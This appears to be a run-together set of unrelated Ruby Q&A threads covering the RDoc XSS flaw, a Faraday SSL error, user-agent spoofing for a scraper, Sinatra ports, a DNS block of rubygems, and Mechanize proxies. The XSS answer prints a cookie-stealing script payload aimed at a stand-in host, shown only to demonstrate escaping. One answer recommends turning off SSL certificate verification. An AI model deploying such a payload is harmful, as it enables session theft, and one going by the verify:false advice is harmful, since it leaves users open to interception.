I've just read http://www.ruby-lang.org/en/news/2013/02/06/rdoc-xss-cve-2013-0256/ , a report about an XSS exploit in RDoc.
I'm on Ubuntu 12.04, and I doubt Ubuntu will be dealing with this vulnerability any time soon.
Will deleting all RDoc documentation and uninstalling the rdoc executable make me safe from this vulnerability?
I don't host RDoc documents for the public, but I might occasionally run gem server for my own viewing if I forget about this vulnerability.
In your case you are safe unless a malicious user gives you a crafted link to your own server. Basically, if someone is hosting RDoc documentation with this exploit, an attacker can send a victim a crafted link that puts code in the target reference of the URL. If you look at the diff in the CVE you can see that the variable "target" was originally passed into the wrapping code unescaped. So someone could send a link like http://example.com/rdoc/File.html#code to inject cookie-stealing script, and the victim's browser would render it.
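The fix amounts to escaping that attacker-controlled value before it is written into the page. Here is a minimal stdlib illustration of the idea (CGI.escapeHTML and the example payload are just for demonstration; the actual RDoc patch does its escaping in the generated JavaScript):

```ruby
require 'cgi'

# A hypothetical attacker-controlled fragment, e.g. from a crafted
# #anchor in the URL.
target = '"><script>send("http://evil.example/?" + document.cookie)</script>'

# Interpolated unescaped, this would reach the browser as live markup.
# HTML-escaping neutralizes it into inert text:
puts CGI.escapeHTML(target)
```

After escaping, the `<script>` tag arrives as `&lt;script&gt;`, which the browser displays rather than executes.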
Running gem server locally should be safe if you adjust how it launches:
gem server -b 127.0.0.1
Server started at http://127.0.0.1:8808
Notice it's on IP 127.0.0.1, which isn't accessible from other machines, only yours. It's the loopback, used for internal connections only.
I started the above server on one of my development hosts and tried to hit it from my desktop; the connection attempt failed.
Hitting it from that box using OpenURI and Nokogiri inside IRB returns:
require 'open-uri'
require 'nokogiri'
Nokogiri::HTML(open('http://127.0.0.1:8808')).at('title').text
=> "RubyGems Documentation Index"
so something's alive out there, and my log shows:
localhost - - [06/Feb/2013:16:08:56 MST] "GET / HTTP/1.1" 200 52435
- -> /
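To see what binding to the loopback means in practice, here is a small stdlib sketch (TCPServer stands in for gem server, and port 0 lets the OS pick an ephemeral port):

```ruby
require 'socket'

# Bind a server to the loopback only, just as `gem server -b 127.0.0.1`
# does with port 8808.
server = TCPServer.new('127.0.0.1', 0)
port = server.addr[1]

# Connecting over the loopback from the same machine succeeds...
client = TCPSocket.new('127.0.0.1', port)
client.close

# ...but the socket was never bound to an external interface, so other
# machines have no route to it.
server.close
```

This is exactly why the desktop-to-development-host connection above failed while the local Nokogiri request succeeded.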
I am a total newbie who has just started learning Ruby, so please be patient with me.
I am doing Ruby challenges where I need to run a Ruby file that launches a web server on my computer. First I run the application from the command line:
ruby app.rb
Then I paste this URL into my browser to access my local server:
http://localhost:4567
On this local web page I click a link that connects to a web server on the Internet, where I should get authenticated. Up to this point everything works fine, but during the authentication I get an error. Without this error, the application would retrieve my profile data from the remote server. This is the error I am getting:
Faraday::SSLError at /callback
handshake alert: unrecognized_name.
I have been trying to resolve this problem for two days. What I have done:
1) I think this error is somehow connected with Java. I tried running the application under several Java versions (6, 7, 8), since people reported the same problem after upgrading to a newer Java version. Unfortunately, my version of Ruby doesn't accept Java 6.
2) A possible solution was posted in "SSL handshake alert: unrecognized_name error since upgrade to Java 1.7.0" (and in some twenty similar Stack Overflow posts about the "handshake alert: unrecognized_name" error): set the jsse.enableSNIExtension property. But I couldn't tell from any of those answers where to apply it. Then I found https://community.jivesoftware.com/docs/DOC-140837, which advised opening the Java Control Panel (I did it through System Preferences > Java), going to the Java tab, clicking View, and adding "-Djsse.enableSNIExtension=false" to the Runtime Parameters, which I did and applied.
3) Another possible solution was found in "Disable SNI Extension for Ruby net/http - Using IP address with SSL/TLS" (the answer given by ZebGir), but I didn't find the file *http.rb in my .rvm or anywhere else on my system.
Any hint or link to a possible solution would be appreciated.
My system is Mac OS X El Capitan.
RVM version 1.27.
Java version 1.8.
Have you tried disabling SSL certificate verification for the Faraday connection? Something like:
connection = Faraday.new 'https://example.com', ssl: { verify: false }
Also see: https://github.com/lostisland/faraday/wiki/Setting-up-SSL-certificates
I have a server running on Debian. It runs a scraper using Ruby and Watir, which loads up headless. I notice that a site can read the HTTP headers my browser sends. How can I hide this information, or send false information, so a site cannot see my operating system?
I figured out a solution. I used X11 forwarding to access Chrome from my local computer, which has a user interface. It is possible to change the user agent via DevTools -> Network conditions, but this does NOT persist across new sessions. So I installed the first Google result for "plugin change chrome user-agent", and this does the trick.
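For what it's worth, the operating system usually leaks through the User-Agent request header, and any HTTP client lets you override it. A stdlib sketch with a made-up browser string (with Watir/Chrome you would instead pass a --user-agent argument when starting the browser, which is what the plugin does persistently):

```ruby
require 'net/http'

# Build a request and replace the default header (which would identify
# the client as "Ruby") with a spoofed desktop browser string.
req = Net::HTTP::Get.new('/')
req['User-Agent'] = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'

puts req['User-Agent']
```

Whatever string you set here is what the site's logs will see; nothing in the header has to match the real OS.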
I'm using Codio to create a Sinatra app. Obviously, since it's cloud-based, I've added the line set :bind, '0.0.0.0' to app.rb. I've also set my database.yml file to say host: 0.0.0.0 for both the development and test environments. (I'm using PostgreSQL, and yes, I made sure under Tools --> Install Software that it is running.)
When I run ruby app.rb in my terminal, Sinatra takes the stage at Port 4567, which I'm able to view perfectly fine.
But when I run rackup, on the other hand, Sinatra takes the stage at port 9292. Trying to preview at that port yields an HTTP Error 502 Bad Gateway status.
(Note: I'm unable to post within the Codio Community forums at the moment--their system doesn't seem to realize I'm logged in when I go into their forums page, and it won't let me log in. I'm standing by for help from them on that. Until then, I figured I'd reach out here on StackOverflow.)
Kenia
Hi, we saw your message and replied, but it seems you haven't picked it up yet. It wasn't clear from that message that you were talking about the Codio forum :) You need to register separately there; the forum is not associated with your Codio account credentials.
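On the port mismatch itself: classic Sinatra's built-in server listens on 4567, while rackup defaults to 9292, so the 502 may simply mean the preview URL points at a port and interface nothing is bound to. A minimal config.ru sketch (assuming app.rb defines a classic-style Sinatra app):

```ruby
# config.ru -- assumes app.rb defines a classic-style Sinatra app
require './app'
run Sinatra::Application
```

You can then start rackup on the port and interface the preview expects, e.g. rackup -p 4567 -o 0.0.0.0 (the -o flag sets the bind host, doing the same job as set :bind, '0.0.0.0').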
I ran
$ gem fetch -V github-linguist
GET http://rubygems.org/latest_specs.4.8.gz
302 Moved Temporarily
GET http://production.s3.rubygems.org/latest_specs.4.8.gz
200 OK
ERROR: While executing gem ... (Zlib::GzipFile::Error)
not in gzip format
Then, to my shock, I opened the link in my browser and saw this message:
Norton DNS
Malicious Web Site Blocked
You attempted to access: production.s3.rubygems.org
This is a known malicious web site. It is recommended that you do NOT visit
this site. This site points to production.s3.rubygems.org.s3.amazonaws.com,
which is malicious.
On pencil's suggestion I ran namebench and have switched to OpenDNS-2.
Probably someone used AWS to distribute malware, and some buggy automated filter now blocks *.amazonaws.com.
It must be a filter somewhere between you and Amazon (router/firewall, proxy, ISP, name server, ...). Start by trying different name servers (like Google's 8.8.8.8).
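You can cross-check a suspicious answer from your system resolver by pointing Ruby's stdlib resolv library at a different name server. A sketch (the query itself needs network access, so it is left commented out):

```ruby
require 'resolv'

# Build a resolver that bypasses the system DNS configuration and asks
# Google's 8.8.8.8 directly.
resolver = Resolv::DNS.new(nameserver: ['8.8.8.8'], search: [], ndots: 1)

# resolver.getaddress('production.s3.rubygems.org') would return the
# address as seen by 8.8.8.8; compare it with what your default
# resolver (e.g. your router or ISP) returns for the same name.
```

If the two answers differ, the filter sits in whichever resolver gave the blocked result.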
I found a neat Ruby script that sums all purchases made on Amazon.de (not other stores, such as the US one) for a given year:
https://github.com/pwaldhauer/amazon-account-crawler
After installing Ruby and the necessary gems (highline and mechanize), I'm able to run the script. But unfortunately I'm behind a proxy server, so the script fails with a "Timeout" error.
I read a lot but couldn't find out how to use a proxy server. I tried setting the HTTP_PROXY environment variable, but still get errors. I also tried the following call:
agent.set_proxy('127.0.0.1', '3128')
But this didn't work either. I have the feeling that the HTTP proxy works, but after the login Amazon switches to HTTPS and that fails.
Can someone tell me a simple way how to tell Mechanize to use a HTTP and HTTPS proxy server?
There is a known issue with Mechanize, HTTPS, and proxies; you will need to use an older version (1.0.0) to get it to work. Also, the port passed to set_proxy should be a number, not a string.
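A side note on the HTTP_PROXY attempt: when Ruby's standard library resolves a proxy for a URL, it reads the lowercase http_proxy environment variable. A quick stdlib check with a hypothetical local proxy (this only inspects the environment; it doesn't open any connection):

```ruby
require 'uri'

# Hypothetical local proxy; the lowercase variable is what Ruby reads.
ENV['http_proxy'] = 'http://127.0.0.1:3128'

# find_proxy returns the proxy URI that would be used for this URL.
proxy = URI('http://www.amazon.de/').find_proxy
puts proxy.host   # the proxy address from the environment
puts proxy.port   # parsed as an Integer
```

Note that the port comes back as an Integer, which matches the point above: agent.set_proxy('127.0.0.1', 3128) with a numeric port, not '3128'.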